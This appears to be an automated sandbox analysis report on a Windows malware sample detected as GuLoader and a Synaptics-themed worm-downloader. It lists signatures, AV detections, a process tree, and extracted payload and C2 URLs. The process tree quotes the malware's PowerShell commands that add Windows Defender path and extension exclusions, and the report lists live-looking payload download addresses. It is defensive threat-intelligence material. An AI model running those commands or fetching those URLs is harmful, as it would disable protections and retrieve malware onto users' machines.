Windows Analysis Report
SecuriteInfo.com.Variant.FakeAlert.2.24488.8627

Overview

General Information

Sample Name:SecuriteInfo.com.Variant.FakeAlert.2.24488.8627 (renamed file extension from 8627 to exe)
Analysis ID:634939
MD5:c5bf732066ab84d1abba5b27638a5191
SHA1:07b3b8a0e9008e459bd7ba727dd8380320dbc5ad
SHA256:a4bdfb7869d435589479e095b8d0c9c2b8f987bd3a8c961424376f18c31c650f
Tags:exe

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Antivirus detection for URL or domain
Antivirus detection for dropped file
Yara detected GuLoader
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Drops PE files to the document folder of the user
Tries to detect virtualization through RDTSC time measurements
Adds a directory exclusion to Windows Defender
Uses dynamic DNS services
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to shutdown / reboot the system
May infect USB drives
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to read the clipboard data
Found dropped PE file which has not been started or loaded
Contains functionality to record screenshots
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to launch a program with higher privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • SecuriteInfo.com.Variant.FakeAlert.2.24488.exe (PID: 6280 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe" MD5: C5BF732066AB84D1ABBA5B27638A5191)
    • cmd.exe (PID: 6292 cmdline: cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 6348 cmdline: powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • powershell.exe (PID: 6700 cmdline: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • cmd.exe (PID: 6316 cmdline: cmd /c start "" "C:\Users\user\AppData\Local\Temp\uniformerede.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • uniformerede.exe (PID: 6432 cmdline: "C:\Users\user\AppData\Local\Temp\uniformerede.exe" MD5: FEDAD1ADEC8A1D90444051B5BDC6445D)
        • ._cache_uniformerede.exe (PID: 6536 cmdline: "C:\Users\user\Desktop\._cache_uniformerede.exe" MD5: C4B2332489C0BA3E3F2A262F1C2C31B8)
        • Synaptics.exe (PID: 6620 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: 2A1D1C20CCA885322254DD2A22F51097)
          • WerFault.exe (PID: 6284 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6620 -s 2904 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
          • WerFault.exe (PID: 6872 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6620 -s 4052 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • Synaptics.exe (PID: 6884 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: 2A1D1C20CCA885322254DD2A22F51097)
  • EXCEL.EXE (PID: 6976 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
  • cleanup
{"Payload URL": "http://2.58.149.33/ominz_QLUnxlrvVz46.bin"}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\YC9w8Aif.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
C:\ProgramData\Synaptics\RCXCD96.tmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
C:\Users\user\Documents\DUUDTUBZFW\~$cache1 | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
C:\Users\user\AppData\Local\Temp\uniformerede.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
C:\ProgramData\Synaptics\Synaptics.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

Source | Rule | Description | Author | Strings
00000007.00000002.532970198.00000000030C0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000006.00000000.270423175.0000000000401000.00000020.00000001.01000000.00000004.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
0000000C.00000002.316350277.0000000000401000.00000020.00000001.01000000.00000007.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
00000009.00000000.364281736.0000000000401000.00000020.00000001.01000000.00000007.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
00000009.00000000.357173364.0000000000401000.00000020.00000001.01000000.00000007.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

Source | Rule | Description | Author | Strings
12.0.Synaptics.exe.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
9.0.Synaptics.exe.400000.3.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
12.2.Synaptics.exe.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
9.2.Synaptics.exe.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
9.0.Synaptics.exe.400000.2.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
                                No Sigma rule has matched
                                Timestamp:05/27/22-04:38:15.388403
                                Source IP:192.168.2.3
                                Destination IP:69.42.215.252
                                SID:2832617
                                Source Port:49739
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected


                                AV Detection

                                Source: http://xred.site50.net/syn/SSLLibrary.dllAvira URL Cloud: Label: malware
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeAvira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exeAvira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exeAvira: detection malicious, Label: TR/Dropper.Gen
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\Users\user\AppData\Local\Temp\YC9w8Aif.exeAvira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
                                Source: C:\Users\user\AppData\Local\Temp\YC9w8Aif.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\Users\user\Documents\DUUDTUBZFW\~$cache1Avira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
                                Source: C:\Users\user\Documents\DUUDTUBZFW\~$cache1Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\Users\user\AppData\Local\Temp\RCXF979.tmpAvira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
                                Source: C:\Users\user\AppData\Local\Temp\RCXF979.tmpAvira: detection malicious, Label: TR/Dropper.Gen
                                Source: C:\Users\user\AppData\Local\Temp\RCXF979.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\ProgramData\Synaptics\RCXCD96.tmpAvira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
                                Source: C:\ProgramData\Synaptics\RCXCD96.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
                                Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\Users\user\AppData\Local\Temp\RCXDA77.tmpAvira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
                                Source: C:\Users\user\AppData\Local\Temp\RCXDA77.tmpAvira: detection malicious, Label: TR/Dropper.Gen
                                Source: C:\Users\user\AppData\Local\Temp\RCXDA77.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: 00000007.00000002.532970198.00000000030C0000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://2.58.149.33/ominz_QLUnxlrvVz46.bin"}
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exeVirustotal: Detection: 62%
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exeReversingLabs: Detection: 58%
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exeAvira: detected
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\YC9w8Aif.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\Documents\DUUDTUBZFW\~$cache1Joe Sandbox ML: detected
                                Source: C:\ProgramData\Synaptics\Synaptics.exeJoe Sandbox ML: detected
                                Source: 0.2.SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
                                Source: 9.0.Synaptics.exe.400000.4.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
                                Source: 9.0.Synaptics.exe.400000.4.unpackAvira: Label: W2000M/Dldr.Agent.17651006
                                Source: 12.2.Synaptics.exe.400000.0.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
                                Source: 12.2.Synaptics.exe.400000.0.unpackAvira: Label: W2000M/Dldr.Agent.17651006
                                Source: 9.2.Synaptics.exe.400000.0.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
                                Source: 9.2.Synaptics.exe.400000.0.unpackAvira: Label: W2000M/Dldr.Agent.17651006
                                Source: 6.0.uniformerede.exe.4b8e14.1.unpackAvira: Label: TR/Patched.Ren.Gen
                                Source: 0.0.SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
                                Source: 6.2.uniformerede.exe.400000.0.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
                                Source: 6.2.uniformerede.exe.400000.0.unpackAvira: Label: W2000M/Dldr.Agent.17651006
                                Source: 9.0.Synaptics.exe.400000.2.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
                                Source: 9.0.Synaptics.exe.400000.2.unpackAvira: Label: W2000M/Dldr.Agent.17651006
                                Source: 0.2.SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.a07634.1.unpackAvira: Label: TR/Patched.Ren.Gen
                                Source: 9.0.Synaptics.exe.400000.0.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
                                Source: 9.0.Synaptics.exe.400000.0.unpackAvira: Label: W2000M/Dldr.Agent.17651006
                                Source: 6.2.uniformerede.exe.4b8e14.1.unpackAvira: Label: TR/Patched.Ren.Gen
                                Source: 6.0.uniformerede.exe.400000.0.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
                                Source: 6.0.uniformerede.exe.400000.0.unpackAvira: Label: W2000M/Dldr.Agent.17651006
                                Source: 12.0.Synaptics.exe.400000.0.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
                                Source: 12.0.Synaptics.exe.400000.0.unpackAvira: Label: W2000M/Dldr.Agent.17651006
                                Source: 9.0.Synaptics.exe.400000.3.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
                                Source: 9.0.Synaptics.exe.400000.3.unpackAvira: Label: W2000M/Dldr.Agent.17651006
                                Source: 9.0.Synaptics.exe.400000.1.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
                                Source: 9.0.Synaptics.exe.400000.1.unpackAvira: Label: W2000M/Dldr.Agent.17651006
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
                                Source: unknownHTTPS traffic detected: 172.217.168.14:443 -> 192.168.2.3:49736 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.217.168.14:443 -> 192.168.2.3:49737 version: TLS 1.2
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeRegistry value created: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\URBANITETENS
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [autorun]
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: autorun.inf
                                Source: uniformerede.exeBinary or memory string: autorun.inf
                                Source: uniformerede.exeBinary or memory string: [autorun]
                                Source: uniformerede.exe, 00000006.00000000.270423175.0000000000401000.00000020.00000001.01000000.00000004.sdmpBinary or memory string: [autorun]
                                Source: uniformerede.exe, 00000006.00000000.270423175.0000000000401000.00000020.00000001.01000000.00000004.sdmpBinary or memory string: autorun.inf
                                Source: Synaptics.exeBinary or memory string: autorun.inf
                                Source: Synaptics.exeBinary or memory string: [autorun]
                                Source: Synaptics.exe, 00000009.00000000.364281736.0000000000401000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: [autorun]
                                Source: Synaptics.exe, 00000009.00000000.364281736.0000000000401000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: autorun.inf
                                Source: Synaptics.exe, 0000000C.00000002.316350277.0000000000401000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: [autorun]
                                Source: Synaptics.exe, 0000000C.00000002.316350277.0000000000401000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: autorun.inf
                                Source: uniformerede.exe.0.drBinary or memory string: [autorun]
                                Source: uniformerede.exe.0.drBinary or memory string: autorun.inf
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.drBinary or memory string: [autorun]
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.drBinary or memory string: autorun.inf
                                Source: YC9w8Aif.exe.9.drBinary or memory string: [autorun]
                                Source: YC9w8Aif.exe.9.drBinary or memory string: autorun.inf
                                Source: ~$cache1.9.drBinary or memory string: [autorun]
                                Source: ~$cache1.9.drBinary or memory string: autorun.inf
                                Source: RCXF979.tmp.9.drBinary or memory string: [autorun]
                                Source: RCXF979.tmp.9.drBinary or memory string: autorun.inf
                                Source: RCXCD96.tmp.6.drBinary or memory string: [autorun]
                                Source: RCXCD96.tmp.6.drBinary or memory string: autorun.inf
                                Source: Synaptics.exe.6.drBinary or memory string: [autorun]
                                Source: Synaptics.exe.6.drBinary or memory string: autorun.inf
                                Source: RCXDA77.tmp.9.drBinary or memory string: [autorun]
                                Source: RCXDA77.tmp.9.drBinary or memory string: autorun.inf
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile opened: C:\Users\user
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile opened: C:\Users\user\AppData
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile opened: C:\Users\user\AppData\Roaming
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,6_2_004099E0
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,6_2_00406018
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00409B1C FindFirstFileA,GetLastError,6_2_00409B1C
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeCode function: 7_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_00405D74
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeCode function: 7_2_0040290B FindFirstFileW,7_2_0040290B
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeCode function: 7_2_0040699E FindFirstFileW,FindClose,7_2_0040699E
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,9_2_004099E0
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_00409B1C FindFirstFileA,GetLastError,9_2_00409B1C
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,9_2_00406018
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,12_2_00406018
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,12_2_004099E0
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_00409B1C FindFirstFileA,GetLastError,12_2_00409B1C

                                Networking

                                Source: TrafficSnort IDS: 2832617 ETPRO TROJAN W32.Bloat-A Checkin 192.168.2.3:49739 -> 69.42.215.252:80
                                Source: unknownDNS query: name: freedns.afraid.org
                                Source: Malware configuration extractorURLs: http://2.58.149.33/ominz_QLUnxlrvVz46.bin
                                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                                Source: Joe Sandbox ViewIP Address: 69.42.215.252 69.42.215.252
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
                                Source: Synaptics.exe, 00000009.00000000.353054699.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.358069688.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408273761.0000000005450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
                                Source: RCXDA77.tmp.9.drString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmp, uniformerede.exe, 00000006.00000000.272489274.00000000004A5000.00000002.00000001.01000000.00000004.sdmp, uniformerede.exe, 00000006.00000003.281465224.0000000005E21000.00000004.00000800.00020000.00000000.sdmp, ._cache_uniformerede.exe, 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp, ._cache_uniformerede.exe, 00000007.00000000.280135055.000000000040A000.00000008.00000001.01000000.00000005.sdmp, uniformerede.exe.0.dr, ._cache_uniformerede.exe.6.dr, Synaptics.exe.6.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: http://weather.service.msn.com/data.aspx
                                Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dlX
                                Source: RCXDA77.tmp.9.drString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
                                Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
                                Source: RCXDA77.tmp.9.drString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                                Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniD0
                                Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
                                Source: RCXDA77.tmp.9.drString found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                                Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.
                                Source: Synaptics.exe, 00000009.00000000.353930908.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoZ
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpx;overflow:hidden
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadro
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadse%
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
                                Source: Synaptics.exe, 00000009.00000000.353930908.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduZ
                                Source: Synaptics.exe, 00000009.00000000.369282651.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.409428989.0000000007970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
